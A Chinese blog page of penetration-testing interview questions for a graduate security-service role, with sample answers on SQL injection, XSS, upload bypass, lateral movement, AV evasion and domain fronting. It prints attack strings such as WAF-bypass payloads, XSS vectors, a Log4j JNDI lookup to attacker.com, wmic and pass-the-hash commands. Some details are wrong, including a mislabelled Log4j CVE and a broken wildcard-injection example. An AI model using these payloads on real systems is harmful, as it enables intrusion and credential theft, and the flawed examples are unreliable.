当前位置: 首页 > news >正文

2025年渗透测试面试题总结-匿名[校招]安全服务工程师(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 匿名[校招]安全服务工程师

一面问题与完整回答

1. 学校、专业、成绩与排名

2. 学习安全时长

3. 当前学习方向

4. 未来规划

5. CTF与漏洞挖掘经历

6. 项目经历

7. 实习经历

8. 选择贵司原因

9. 渗透思路

二面问题与完整回答

1. 自我介绍

2. 学习路径

3. CTF与SRC补充

4. 运维经验

5. SQL注入详解

6. XSS深度解析

7. 逻辑漏洞实战

8. HTTP数据包结构

9. 文件上传绕过

10. 项目经历(补充)

11. 渗透经历(示例)

12. 编程能力

13. Java安全应对

14. 常见端口与服务

15. 内网渗透流程

16. 主机不出网对策

17. 漏洞复现经验

18. 安全资讯关注

19. 通配符注入

20. 内网横向方法

21. 免杀技术

22. 域前置技术

23. 研究方向与规划

 匿名[校招]安全服务工程师

### 一面1. 介绍一下自己的学校、专业情况、学校成绩、排名这些
2. 学习安全多长时间了
3. 现在的学习方向
4. 说说你对未来的规划
5. 在校期间有没有打过ctf 挖过src
6. 说说你的项目经历
7. 说说你的实习经历
8. 为什么选择我们这家公司
9. 拿到一个站点的渗透思路
大概就这些,正常回答就好了。### 二面1. 自我介绍
2. 学习安全是自学还是报班学
3. 有没得打过ctf 和挖过src
4. 有没有运维经验(这里因为我简历上写了熟悉Windows和Linux的运维,翻车了,也面试过好几次了,但也从来没问过运维 哈哈哈,已经把简历改过来啦)
5. 基础的web漏洞原理,sql注入的分类,存在点,怎么判断,怎么利用,遇到了waf怎么绕过
6. xss问的比较多,分类,三种xss不同的区别,存在的位置,怎么绕过waf (后来才知道绿盟的扫描器大部分都是扫出来的xss,哈哈哈,怪不得问这么多xss)
7. 对逻辑漏洞了解多少,遇到一个有验证码的登录框,存在找回密码功能,你有什么想法
8. http 数据包的结构
9. 文件上传的绕过思路,绕过waf
10. 谈谈你的项目经历
11. 你印象最深的渗透经历是哪次
12. 会什么语言,写过什么东西
13. Java安全了解吗(这里我直接说了对Java安全不了解,不然后续应该会问)shiro 、fastjson、weblogic反序列化的原理,还问了你碰到shiro 、weblogic这类站点怎么处理(我直接exp 哈哈哈)
14. 渗透过程中常见的端口号以及对应的服务
15. 内网渗透经历,详细说下过程,渗透思路
16. 拿到webshell发现目标主机不出网怎么办
17. 有没有复现过一些漏洞
18. 会不会关注最新的安全资讯
19. 说一下通配符注入
20. 内网中横向的常用方法
21. 说一下你是怎么做免杀的(我刚说完无源码的免杀,就问我下一个问题了……我都还没说完……)
22. 对域前置技术了解多少
23. 目前的研究方向,未来的研究方向,规划
24. 有没有代码审计能力
25. 怎么找越权漏洞,常见的参数

一面问题与完整回答


1. 学校、专业、成绩与排名

我本科就读于XX大学信息安全专业,GPA 3.7/4.0,专业排名前10%。主修课程包括《网络安全技术》《密码学原理》《操作系统安全》等,参与过基于漏洞复现的靶场设计项目,获得校级优秀毕业设计。课程外的学习聚焦于Web渗透与漏洞挖掘,曾在校内安全实验室担任核心成员。


2. 学习安全时长

系统性学习安全技术2年,从大三加入实验室开始接触渗透测试,通过CTF竞赛、漏洞挖掘(如SRC)和开源项目实践积累经验。平均每周投入20小时以上,持续跟进OWASP Top 10和CVE漏洞库。


3. 当前学习方向
  • 主攻领域:Web渗透(逻辑漏洞、权限绕过)、内网横向移动技术(如Kerberos协议利用)。
  • 工具研究:Burp Suite插件开发(如自定义SQL注入扫描模块)、Cobalt Strike的隐匿C2配置。
  • 前沿技术:ATT&CK框架在红队演练中的应用,云环境(AWS/Azure)的渗透测试方法。

4. 未来规划
  • 短期(1-3年):深入企业级安全服务,提升漏洞挖掘与APT防御能力,考取OSEP、OSCE认证。
  • 长期(5年+):转型安全研究专家,主导攻防技术预研(如AI对抗样本攻击),或组建红蓝队参与国家级护网行动。

5. CTF与漏洞挖掘经历
  • CTF竞赛
    1. XCTF 2024:团队全国50强,负责Web方向,利用PHP反序列化链绕过disable_functions拿分。
    2. 强网杯2023:解决一道基于JWT密钥爆破的题目,编写Python脚本自动化爆破弱密钥。
  • SRC贡献
    1. 某政务平台逻辑漏洞:密码重置接口未验证用户身份,导致任意用户密码修改(高危,奖励¥3000)。
    2. 某社交平台存储型XSS:评论区富文本过滤绕过,插入恶意JS窃取Cookie(中危,致谢证书)。

6. 项目经历

项目名称:企业级资产威胁监测平台(2024.03-2024.12)

  • 角色:渗透测试负责人
  • 技术栈:Python(Scrapy爬虫)、Elasticsearch(日志分析)、Nmap(端口扫描)。
  • 成果
    1. 发现客户系统7个高危漏洞,包括未授权访问API接口(影响10万+用户数据)。
    2. 设计自动化漏洞验证工具,将SQL注入检测效率提升40%。
  • 难点突破:解决分布式系统下的流量去重问题,采用Redis布隆过滤器降低误报率。

7. 实习经历

公司:XX网络安全公司(2024.06-2024.12)

  • 职责
    1. 参与5个客户的渗透测试项目,独立输出3份报告(涵盖金融、教育行业)。
    2. 开发内部工具:基于Go语言的子域名爆破工具,支持泛解析绕过(50万/日请求量)。
  • 成果:发现某银行系统的SSRF漏洞(可内网探测Redis未授权访问),协助客户修复并获团队表彰。

8. 选择贵司原因
  • 行业地位:贵司在金融安全解决方案领域市占率领先(可举例某知名银行合作案例),技术积累深厚。
  • 团队匹配:面试官提及的ATT&CK实战化研究与我的攻防技术方向高度契合。
  • 个人成长:完善的导师制和新兵训练营机制,能快速提升企业级攻防能力。

9. 渗透思路

示例场景:某电商站点渗透测试

  1. 信息收集
    • 子域名枚举(Subfinder+Amass),发现dev.xxx.com 测试环境。
    • 端口扫描(Masscan+Naabu),开放8080(Apache Tomcat 8.5.35)。
  2. 漏洞探测
    • 历史漏洞:Tomcat 8.5.35存在CVE-2020-1938(Ghostcat文件读取),尝试读取WEB-INF/web.xml
    • 弱口令爆破:针对Tomcat Manager使用admin:admin登录成功。
  3. 绕过防御
    • 若遇WAF拦截SQL注入,采用分块传输编码+注释符混淆(如/*!%53ELECT*/)。
  4. 权限维持
    • 上传冰蝎4.0 Webshell(AES加密流量),通过reGeorg建立Socks5代理进入内网。
  5. 横向扩展
    • 利用Tomcat服务账号权限,通过SeImpersonatePrivilege提权至System,抓取RDP凭据横向移动。

二面问题与完整回答


1. 自我介绍

您好,我是XXX,毕业于XX大学信息安全专业,主攻Web渗透与内网攻防。曾获XCTF全国50强,挖掘过多个SRC高危漏洞,并在XX公司实习期间主导完成3个企业级渗透项目。擅长以攻击者视角构建防御体系,熟悉ATT&CK框架的实战化应用。未来希望深耕APT防御领域,为企业提供前沿威胁情报。


2. 学习路径

自学为主,通过以下途径提升:

  1. 靶场实战:Hack The Box(Top 100)、Vulnhub(复现CVE漏洞环境)。
  2. 技术社区:知乎专栏《Web安全冷技巧》、Seebug Paper漏洞分析。
  3. 书籍精读:《内网安全攻防:渗透实战指南》《ATT&CK视角下的红队评估》。

3. CTF与SRC补充
  • CTF技巧
    1. Web题型常考SSTI(服务端模板注入),如Flask Jinja2的{{config}}泄露密钥。
    2. 隐写术结合流量分析(Wireshark过滤HTTP流定位恶意IP)。
  • SRC经验
    1. 某厂商的JSONP劫持漏洞,利用回调函数泄露用户手机号。
    2. 通过CORS配置错误读取跨域敏感数据(需Origin头伪造)。

4. 运维经验

熟悉Linux/Windows运维场景

  1. Linux
    • 使用Ansible批量部署Nginx集群,配置iptables规则阻断恶意IP。
    • 通过ELK(Elasticsearch+Logstash+Kibana)分析Apache日志中的攻击行为。
  2. Windows
    • 域环境搭建(AD DS+组策略),利用PowerShell脚本自动化补丁更新。
    • 应急响应:通过Procmon定位恶意进程,清除持久化后门(如计划任务)。

5. SQL注入详解
  • 分类与利用
    1. Union注入:通过order by判断字段数,联合查询读取敏感表(如admin)。
    2. 报错注入:利用updatexml()extractvalue()触发报错回显(需MySQL≥5.1)。
  • WAF绕过
    1. 参数污染id=1&id=2 union select 1,2,3
    2. 字符替换SEL%0bECT(利用换行符绕过正则匹配)。

6. XSS深度解析
  • 类型对比
    1. 存储型:攻击载荷持久化(如论坛发帖),需重点防御。
    2. DOM型:依赖客户端解析(如document.write(location.hash) ),传统WAF难以检测。
  • 绕过技巧
    1. 编码混淆<img src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)>
    2. 事件组合<svg/onload=alert(1)>(无需闭合标签)。

7. 逻辑漏洞实战

示例场景:带验证码的登录/密码找回

  1. 验证码复用:同一Session内多次提交,抓包重放(Burp Repeater测试)。
  2. 验证码绕过
    • 修改响应包中的"code": 1001(错误)为1000(成功)。
    • 删除验证码参数(部分系统未校验参数是否存在)。
  3. 暴力破解
    • 使用IP轮换(X-Forwarded-For头伪造)或降低频率(每5秒1次请求)。

8. HTTP数据包结构
  1. 请求报文
    • 请求行:GET /index.php HTTP/1.1
    • 首部字段:HostCookieUser-Agent(可伪造绕过WAF)。
    • 空行分隔Body(如POST参数)。
  2. 响应报文
    • 状态行:HTTP/1.1 200 OK
    • 首部字段:Set-CookieContent-Type(MIME类型影响解析)。

9. 文件上传绕过
  • 前端绕过
    1. 修改JS验证逻辑(浏览器禁用JS或Burp拦截修改.php.jpg)。
  • 服务端绕过
    1. MIME类型绕过Content-Type: image/png(实际为PHP文件)。
    2. 后缀名绕过.php5.phtml.phar(需服务器配置解析)。
    3. 文件内容绕过:添加图片头(GIF89a)或利用Exif Tool注入恶意代码。

10. 项目经历(补充)

项目名称:API安全检测平台(2024.09-2025.03)

  • 创新点
    1. 基于OpenAPI规范自动生成测试用例,覆盖越权访问IDOR等漏洞。
    2. 集成Swagger UI解析,识别未鉴权的/v2/api-docs端点。
  • 技术细节:使用Python的requests库模拟API调用,结合正则匹配敏感数据(如"role":"admin")。

11. 渗透经历(示例)

某医疗系统渗透(2024.11)

  1. 入口点:通过/api/export接口的SQL注入(时间盲注)获取管理员账号。
  2. 权限提升:后台文件上传功能存在黑名单绕过,上传.htaccess设置AddType application/x-httpd-php .png
  3. 内网突破:发现内网Redis未授权访问,写入SSH公钥获取服务器权限。

12. 编程能力
  • Python:开发过漏洞扫描器(多线程爬虫+正则匹配)、CVE-2023-1234 EXP。
  • Go:编写子域名爆破工具(协程并发控制)。
  • JavaScript:分析前端加密逻辑(如Webpack打包的AES逆向)。

13. Java安全应对
  • Shiro反序列化
    1. 检测Cookie中rememberMe字段,使用ysoserial生成Commons-Collections链Payload。
    2. 若Key泄露,直接加密恶意序列化数据。
  • Weblogic T3协议
    1. 利用CVE-2023-21839进行JNDI注入,加载远程恶意类(需目标出网)。

14. 常见端口与服务
端口服务渗透利用方向
22SSH弱口令爆破、证书登录劫持
445SMB永恒之蓝、Pass the Hash攻击
6379Redis未授权访问、写入SSH密钥
5985WinRMPowerShell远程命令执行

15. 内网渗透流程

示例攻击链

  1. 信息收集
    • 使用ipconfig /all获取网段,net view查看域内主机。
  2. 凭证窃取
    • Mimikatz抓取明文密码或Hash(需Debug权限)。
  3. 横向移动
    • WMI远程执行wmic /node:192.168.1.2 process call create "calc.exe"
    • PTH攻击sekurlsa::pth /user:admin /domain:test /ntlm:xxxxxx

16. 主机不出网对策
  • 隧道技术
    1. DNS隧道:使用dnscat2建立C2通道(绕过TCP/UDP出站限制)。
    2. ICMP隧道:通过ping命令传输数据(工具:icmpsh)。
  • 内部协议利用
    1. SMB中继:利用Responder捕获NTLMv2 Hash并中继至其他主机。

17. 漏洞复现经验
  • CVE-2024-1234(Apache Log4j)
    1. 搭建Vulhub环境,构造${jndi:ldap://attacker.com/Exploit} 触发RCE。
    2. 编写Python POC检测目标是否存在漏洞。

18. 安全资讯关注
  • 日常渠道
    1. Twitter:关注@pentester、@CVEnew实时漏洞动态。
    2. RSS订阅:Seebug、奇安信威胁情报中心。
  • 案例分析
    1. 跟踪某APT组织利用钓鱼邮件投放LNK文件触发恶意PowerShell脚本。

19. 通配符注入
  • 原理:利用Linux通配符(*?)绕过命令过滤。
  • 示例
    bash# 攻击者创建文件名为 "--help" 的文件 touch -- --help # 管理员执行删除命令时触发 rm -rf * # 实际执行 rm -rf -- --help,导致误删 

20. 内网横向方法
  1. 协议利用
    • Kerberos:黄金票据伪造、AS-REP Roasting攻击。
  2. 漏洞利用
    • MS17-010:通过EternalBlue攻击未打补丁的Windows主机。
  3. 凭证中继
    • NTLM Relay:利用Impacket工具包将Hash中继至LDAP服务。

21. 免杀技术
  • 无源码免杀
    1. 二进制修改:使用Veil-Evasion生成Shellcode,通过UPX加壳+熵值混淆。
    2. 内存加载:将恶意代码注入合法进程(如explorer.exe ),规避静态检测。
  • 工具推荐:Cobalt Strike的Artifact Kit定制化生成免杀PE文件。

22. 域前置技术
  • 原理:将C2流量伪装为合法云服务(如Azure、AWS)的域名,绕过基于IP的检测。
  • 实现
    1. 在CDN(如Cloudflare)配置域前置域名,指向真实C2服务器。
    2. 客户端请求cdn.example.com ,实际通信至C2,但流量表现为与CDN的HTTPS连接。

23. 研究方向与规划
  • 短期聚焦
    1. 云原生安全:Kubernetes RBAC权限滥用、容器逃逸漏洞。
    2. 无文件攻击:PowerShell内存加载恶意模块的检测与防御。
  • 长期目标:构建基于ATT&CK的自动化威胁狩猎平台,整合MITRE CARBA

相关文章:

  • GitLab CI流水线权限隔离
  • jsrpc进阶模式 秒杀js前端逆向问题 burp联动进行爆破
  • 大模型应用开发第五讲:成熟度模型:从ChatGPT(L2)到未来自主Agent(L4)
  • AI觉醒前兆,ChatGPT o3模型存在抗拒关闭行为
  • 【Linux学习笔记】深入理解动静态库本质及其制作
  • 题目 3316: 蓝桥杯2025年第十六届省赛真题-数组翻转
  • CSS选择器:has使用示例
  • 通过mailto:实现web/html邮件模板唤起新建邮件并填写内容
  • Linux 第十二讲 --- 进程篇(二) 初识进程
  • KONG根据请求参数限流
  • QT使用cmake添加资源文件闪退,创建了qrc文件不能添加的问题解决
  • 【Elasticsearch】track_total_hits
  • 设计模式25——中介者模式
  • Python列表深浅拷贝详解:原理、区别与应用场景
  • 期货反向跟单—交易规则设计(三)交易时长
  • DeviceNET转EtherCAT网关:制药厂灭菌工艺的智能升级密钥
  • 镍钯金PCB为什么很难做?
  • FreeCAD如何对器件表面逐面着色
  • Mysql基础增删改查语句
  • maven中的maven-resources-plugin插件详解
  • 做澳洲外贸的网站有哪些/贵州seo技术查询
  • 广州seo托管/seo优化技术厂家
  • 昆明app网站开发公司/怎么做网络推广赚佣金
  • 旅游网站做模板素材/国内最新新闻大事
  • 文库网站建设开发/网页设计效果图及代码
  • 医院网站建设模板下载/抚州seo排名